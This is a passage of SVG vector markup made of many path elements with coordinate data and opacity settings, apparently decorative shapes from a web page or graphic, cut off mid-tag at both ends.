.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 